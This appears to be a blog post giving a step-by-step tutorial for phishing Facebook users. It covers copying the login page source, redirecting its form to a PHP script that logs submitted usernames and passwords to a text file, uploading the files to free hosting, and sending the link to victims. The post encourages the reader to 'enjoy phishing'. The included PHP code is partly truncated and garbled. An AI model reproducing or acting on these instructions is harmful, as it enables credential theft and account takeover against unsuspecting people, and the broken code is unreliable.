Facebook Hacking By Phishing

Phishing :-
Sending an e-mail to a user and falsely claiming to be an established enterprise in an attempt to scam the user into giving away private information that will be used for identity theft. The e-mail directs the user to visit a Web site page where the user is asked to login or update personal information, such as passwords and credit card, bank account numbers, etc. that the established organization has already with them. The Web site, however, is bogus and false and set up only to steal the user’s information.

1) Go to facebook, and view the source, copy all the text to notepad.


2) You will need to change some codes so press: Ctrl + F


3) Search for action

You should get: action=www.facebook.com/login and something written alongside

4) Delete all the facebook.com crap, and put: funny.php


5) Beside action you will see something saying: method=post

change “post” to “get” save the file,
name it: index.php and save it to desktop but remember!
where it says: “save as type” change it to “all files”
this is very important or else it will not work properly

6) Make a new file in notepad, and put this code:

$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

7) Now, save it as funny.php and remember the save as file type to all files.


8) Now, make a new file in notepad, don't write anything,

save it as: passwords.txt

9) Now, upload all of them in www.t35.com or www.110mb.com and send out the links of your page to anyone's account you would like to do phishing for.


After a user types the username and password on your phishing area, you will get it hacked.


Good Luck And Enjoy Phishing!!!

0 comments:

Post a Comment